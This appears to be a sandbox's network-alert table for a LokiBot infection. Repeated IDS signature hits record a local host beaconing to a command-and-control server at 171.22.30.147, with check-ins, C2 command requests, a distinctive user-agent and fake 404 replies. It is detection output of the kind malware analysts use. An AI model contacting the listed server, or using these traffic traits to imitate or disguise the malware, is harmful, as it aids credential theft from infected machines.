              192.168.2.3171.22.30.14750012802024313 01/05/23-08:53:43.190304TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749833802024313 01/05/23-08:52:50.090304TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749951802024318 01/05/23-08:53:24.927407TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749891802021641 01/05/23-08:53:07.205477TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750047802021641 01/05/23-08:53:54.007519TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749796802024313 01/05/23-08:52:39.986568TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749773802024313 01/05/23-08:52:31.909319TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749924802025381 01/05/23-08:53:17.587003TCP2025381ET TROJAN LokiBot Checkin4992480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749746802025381 01/05/23-08:52:24.299560TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749833802024318 01/05/23-08:52:50.090304TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500682025483 01/05/23-08:53:59.729426TCP2025483ET TROJAN LokiBot Fake 404 Response8050068171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749887802025381 01/05/23-08:53:06.117016TCP2025381ET TROJAN LokiBot Checkin4988780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749974802024318 01/05/23-08:53:33.106432TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997480192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499792025483 01/05/23-08:53:34.509731TCP2025483ET TROJAN LokiBot Fake 404 Response8049979171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749773802024318 01/05/23-08:52:31.909319TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498422025483 01/05/23-08:52:54.095459TCP2025483ET TROJAN LokiBot Fake 404 Response8049842171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749951802024313 01/05/23-08:53:24.927407TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749993802825766 01/05/23-08:53:38.145026TCP2825766ETPRO TROJAN LokiBot Checkin M24999380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749974802024313 01/05/23-08:53:33.106432TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749796802024318 01/05/23-08:52:39.986568TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749994802024313 01/05/23-08:53:38.408241TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749990802825766 01/05/23-08:53:37.383838TCP2825766ETPRO TROJAN LokiBot Checkin M24999080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749852802825766 01/05/23-08:52:56.705137TCP2825766ETPRO TROJAN LokiBot Checkin M24985280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749723802025381 01/05/23-08:52:17.811814TCP2025381ET TROJAN LokiBot Checkin4972380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500182025483 01/05/23-08:53:45.088343TCP2025483ET TROJAN LokiBot Fake 404 Response8050018171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749994802024318 01/05/23-08:53:38.408241TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749868802021641 01/05/23-08:53:01.029018TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749908802024313 01/05/23-08:53:13.214132TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749704802024318 01/05/23-08:52:08.934535TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750032802024318 01/05/23-08:53:49.938594TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749908802024318 01/05/23-08:53:13.214132TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750081802024318 01/05/23-08:54:03.233046TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750005802825766 01/05/23-08:53:41.297546TCP2825766ETPRO TROJAN LokiBot Checkin M25000580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750032802024313 01/05/23-08:53:49.938594TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749730802021641 01/05/23-08:52:19.853027TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749704802024313 01/05/23-08:52:08.934535TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749747802024318 01/05/23-08:52:24.577114TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750044802021641 01/05/23-08:53:53.227481TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750081802024313 01/05/23-08:54:03.233046TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750015802024318 01/05/23-08:53:43.993137TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749925802024318 01/05/23-08:53:17.874226TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749865802021641 01/05/23-08:53:00.234414TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749888802024318 01/05/23-08:53:06.392338TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749927802025381 01/05/23-08:53:18.426652TCP2025381ET TROJAN LokiBot Checkin4992780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749772802025381 01/05/23-08:52:31.644906TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497932025483 01/05/23-08:52:39.250846TCP2025483ET TROJAN LokiBot Fake 404 Response8049793171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749950802025381 01/05/23-08:53:24.624259TCP2025381ET TROJAN LokiBot Checkin4995080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750015802024313 01/05/23-08:53:43.993137TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749888802024313 01/05/23-08:53:06.392338TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749700802025381 01/05/23-08:52:07.351938TCP2025381ET TROJAN LokiBot Checkin4970080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749971802024313 01/05/23-08:53:32.299331TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749977802024313 01/05/23-08:53:33.899852TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749921802825766 01/05/23-08:53:16.794242TCP2825766ETPRO TROJAN LokiBot Checkin M24992180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499632025483 01/05/23-08:53:30.225111TCP2025483ET TROJAN LokiBot Fake 404 Response8049963171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380498702025483 01/05/23-08:53:01.650644TCP2025483ET TROJAN LokiBot Fake 404 Response8049870171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749971802024318 01/05/23-08:53:32.299331TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500802025483 01/05/23-08:54:02.938266TCP2025483ET TROJAN LokiBot Fake 404 Response8050080171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749743802825766 01/05/23-08:52:23.467755TCP2825766ETPRO TROJAN LokiBot Checkin M24974380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750077802825766 01/05/23-08:54:02.067623TCP2825766ETPRO TROJAN LokiBot Checkin M25007780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749832802825766 01/05/23-08:52:49.809310TCP2825766ETPRO TROJAN LokiBot Checkin M24983280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500022025483 01/05/23-08:53:40.584610TCP2025483ET TROJAN LokiBot Fake 404 Response8050002171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380499292025483 01/05/23-08:53:19.030233TCP2025483ET TROJAN LokiBot Fake 404 Response8049929171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749937802021641 01/05/23-08:53:21.090422TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750064802021641 01/05/23-08:53:58.597698TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750034802025381 01/05/23-08:53:50.478539TCP2025381ET TROJAN LokiBot Checkin5003480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749848802021641 01/05/23-08:52:55.640788TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749759802021641 01/05/23-08:52:28.024665TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750008802825766 01/05/23-08:53:42.094852TCP2825766ETPRO TROJAN LokiBot Checkin M25000880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749819802024318 01/05/23-08:52:46.293306TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749819802024313 01/05/23-08:52:46.293306TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750054802825766 01/05/23-08:53:55.890469TCP2825766ETPRO TROJAN LokiBot Checkin M25005480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749779802021641 01/05/23-08:52:35.235559TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498642025483 01/05/23-08:53:00.058616TCP2025483ET TROJAN LokiBot Fake 404 Response8049864171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380497062025483 01/05/23-08:52:09.863839TCP2025483ET TROJAN LokiBot Fake 404 Response8049706171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749901802025381 01/05/23-08:53:11.357263TCP2025381ET TROJAN LokiBot Checkin4990180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500462025483 01/05/23-08:53:53.824439TCP2025483ET TROJAN LokiBot Fake 404 Response8050046171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750080802025381 01/05/23-08:54:02.852694TCP2025381ET TROJAN LokiBot Checkin5008080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749997802024313 01/05/23-08:53:39.208772TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749729802025381 01/05/23-08:52:19.554519TCP2025381ET TROJAN LokiBot Checkin4972980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749726802025381 01/05/23-08:52:18.702884TCP2025381ET TROJAN LokiBot Checkin4972680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749997802024318 01/05/23-08:53:39.208772TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749858802825766 01/05/23-08:52:58.341182TCP2825766ETPRO TROJAN LokiBot Checkin M24985880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749947802825766 01/05/23-08:53:23.814636TCP2825766ETPRO TROJAN LokiBot Checkin M24994780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500302025483 01/05/23-08:53:49.463564TCP2025483ET TROJAN LokiBot Fake 404 Response8050030171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749815802025381 01/05/23-08:52:45.213789TCP2025381ET TROJAN LokiBot Checkin4981580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749766802825766 01/05/23-08:52:30.012463TCP2825766ETPRO TROJAN LokiBot Checkin M24976680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749855802825766 01/05/23-08:52:57.514506TCP2825766ETPRO TROJAN LokiBot Checkin M24985580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749904802025381 01/05/23-08:53:12.139251TCP2025381ET TROJAN LokiBot Checkin4990480192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499572025483 01/05/23-08:53:26.847761TCP2025483ET TROJAN LokiBot Fake 404 Response8049957171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749944802825766 01/05/23-08:53:23.021157TCP2825766ETPRO TROJAN LokiBot Checkin M24994480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749907802025381 01/05/23-08:53:12.956728TCP2025381ET TROJAN LokiBot Checkin4990780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499352025483 01/05/23-08:53:20.648559TCP2025483ET TROJAN LokiBot Fake 404 Response8049935171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749902802024313 01/05/23-08:53:11.610501TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749813802024313 01/05/23-08:52:44.686594TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749816802024313 01/05/23-08:52:45.483412TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750051802825766 01/05/23-08:53:55.100340TCP2825766ETPRO TROJAN LokiBot Checkin M25005180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749818802025381 01/05/23-08:52:46.013246TCP2025381ET TROJAN LokiBot Checkin4981880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749905802024318 01/05/23-08:53:12.409052TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750035802024318 01/05/23-08:53:50.741604TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749769802825766 01/05/23-08:52:30.825016TCP2825766ETPRO TROJAN LokiBot Checkin M24976980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499132025483 01/05/23-08:53:14.676236TCP2025483ET TROJAN LokiBot Fake 404 Response8049913171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749724802024313 01/05/23-08:52:18.098497TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749905802024313 01/05/23-08:53:12.409052TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750011802025381 01/05/23-08:53:42.925761TCP2025381ET TROJAN LokiBot Checkin5001180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749753802021641 01/05/23-08:52:26.326305TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749727802024313 01/05/23-08:52:18.985108TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749813802024318 01/05/23-08:52:44.686594TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750067802021641 01/05/23-08:53:59.373237TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749724802024318 01/05/23-08:52:18.098497TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749902802024318 01/05/23-08:53:11.610501TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749842802021641 01/05/23-08:52:54.011182TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750038802024318 01/05/23-08:53:51.593310TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749884802025381 01/05/23-08:53:05.293982TCP2025381ET TROJAN LokiBot Checkin4988480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749973802025381 01/05/23-08:53:32.829653TCP2025381ET TROJAN LokiBot Checkin4997380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750038802024313 01/05/23-08:53:51.593310TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749931802021641 01/05/23-08:53:19.484274TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500742025483 01/05/23-08:54:01.312985TCP2025483ET TROJAN LokiBot Fake 404 Response8050074171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749795802025381 01/05/23-08:52:39.717554TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749882802024318 01/05/23-08:53:04.789158TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749793802024318 01/05/23-08:52:39.171445TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749882802024313 01/05/23-08:53:04.789158TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500522025483 01/05/23-08:53:55.452652TCP2025483ET TROJAN LokiBot Fake 404 Response8050052171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749793802024313 01/05/23-08:52:39.171445TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749870802024313 01/05/23-08:53:01.561418TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749853802025381 01/05/23-08:52:56.960046TCP2025381ET TROJAN LokiBot Checkin4985380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749965802024313 01/05/23-08:53:30.671447TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749766802021641 01/05/23-08:52:30.012463TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749904802024313 01/05/23-08:53:12.139251TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749948802025381 01/05/23-08:53:24.079081TCP2025381ET TROJAN LokiBot Checkin4994880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749965802024318 01/05/23-08:53:30.671447TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500612025483 01/05/23-08:53:57.906111TCP2025483ET TROJAN LokiBot Fake 404 Response8050061171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380498112025483 01/05/23-08:52:44.228358TCP2025483ET TROJAN LokiBot Fake 404 Response8049811171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380498522025483 01/05/23-08:52:56.790001TCP2025483ET TROJAN LokiBot Fake 404 Response8049852171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380500202025483 01/05/23-08:53:45.721042TCP2025483ET TROJAN LokiBot Fake 404 Response8050020171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749798802825766 01/05/23-08:52:40.547899TCP2825766ETPRO TROJAN LokiBot Checkin M24979880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749870802024318 01/05/23-08:53:01.561418TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499482025483 01/05/23-08:53:24.163130TCP2025483ET TROJAN LokiBot Fake 404 Response8049948171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749738802021641 01/05/23-08:52:22.066688TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750066802021641 01/05/23-08:53:59.096230TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750005802021641 01/05/23-08:53:41.297546TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499072025483 01/05/23-08:53:13.039053TCP2025483ET TROJAN LokiBot Fake 404 Response8049907171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749993802024318 01/05/23-08:53:38.145026TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750065802825766 01/05/23-08:53:58.843527TCP2825766ETPRO TROJAN LokiBot Checkin M25006580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749791802025381 01/05/23-08:52:38.617554TCP2025381ET TROJAN LokiBot Checkin4979180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749730802025381 01/05/23-08:52:19.853027TCP2025381ET TROJAN LokiBot Checkin4973080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498932025483 01/05/23-08:53:07.831808TCP2025483ET TROJAN LokiBot Fake 404 Response8049893171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749932802024313 01/05/23-08:53:19.762349TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749993802024313 01/05/23-08:53:38.145026TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750004802825766 01/05/23-08:53:41.033557TCP2825766ETPRO TROJAN LokiBot Checkin M25000480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750061802021641 01/05/23-08:53:57.824423TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749886802025381 01/05/23-08:53:05.845633TCP2025381ET TROJAN LokiBot Checkin4988680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749937802024313 01/05/23-08:53:21.090422TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749737802825766 01/05/23-08:52:21.818381TCP2825766ETPRO TROJAN LokiBot Checkin M24973780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749932802024318 01/05/23-08:53:19.762349TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749733802021641 01/05/23-08:52:20.679095TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749889802021641 01/05/23-08:53:06.674333TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749709802825766 01/05/23-08:52:11.256691TCP2825766ETPRO TROJAN LokiBot Checkin M24970980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750037802825766 01/05/23-08:53:51.314352TCP2825766ETPRO TROJAN LokiBot Checkin M25003780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749793802825766 01/05/23-08:52:39.171445TCP2825766ETPRO TROJAN LokiBot Checkin M24979380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750060802825766 01/05/23-08:53:57.543966TCP2825766ETPRO TROJAN LokiBot Checkin M25006080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750000802021641 01/05/23-08:53:39.996140TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749732802825766 01/05/23-08:52:20.401546TCP2825766ETPRO TROJAN LokiBot Checkin M24973280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749976802025381 01/05/23-08:53:33.629058TCP2025381ET TROJAN LokiBot Checkin4997680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749881802025381 01/05/23-08:53:04.500331TCP2025381ET TROJAN LokiBot Checkin4988180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749998802024318 01/05/23-08:53:39.461942TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749827802825766 01/05/23-08:52:48.461129TCP2825766ETPRO TROJAN LokiBot Checkin M24982780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749814802024313 01/05/23-08:52:44.953030TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749998802024313 01/05/23-08:53:39.461942TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749856802021641 01/05/23-08:52:57.793570TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749704802825766 01/05/23-08:52:08.934535TCP2825766ETPRO TROJAN LokiBot Checkin M24970480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749763802025381 01/05/23-08:52:29.176849TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749909802024318 01/05/23-08:53:13.489642TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749858802025381 01/05/23-08:52:58.341182TCP2025381ET TROJAN LokiBot Checkin4985880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749909802024313 01/05/23-08:53:13.489642TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750032802825766 01/05/23-08:53:49.938594TCP2825766ETPRO TROJAN LokiBot Checkin M25003280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749904802024318 01/05/23-08:53:12.139251TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749761802021641 01/05/23-08:52:28.591148TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500502025483 01/05/23-08:53:54.876977TCP2025483ET TROJAN LokiBot Fake 404 Response8050050171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380499592025483 01/05/23-08:53:28.156512TCP2025483ET TROJAN LokiBot Fake 404 Response8049959171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749847802024313 01/05/23-08:52:55.372015TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500312025483 01/05/23-08:53:49.742875TCP2025483ET TROJAN LokiBot Fake 404 Response8050031171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749884802021641 01/05/23-08:53:05.293982TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749796802025381 01/05/23-08:52:39.986568TCP2025381ET TROJAN LokiBot Checkin4979680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500722025483 01/05/23-08:54:00.772320TCP2025483ET TROJAN LokiBot Fake 404 Response8050072171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749875802024318 01/05/23-08:53:02.907470TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987580192.168.2.3171.22.30.147
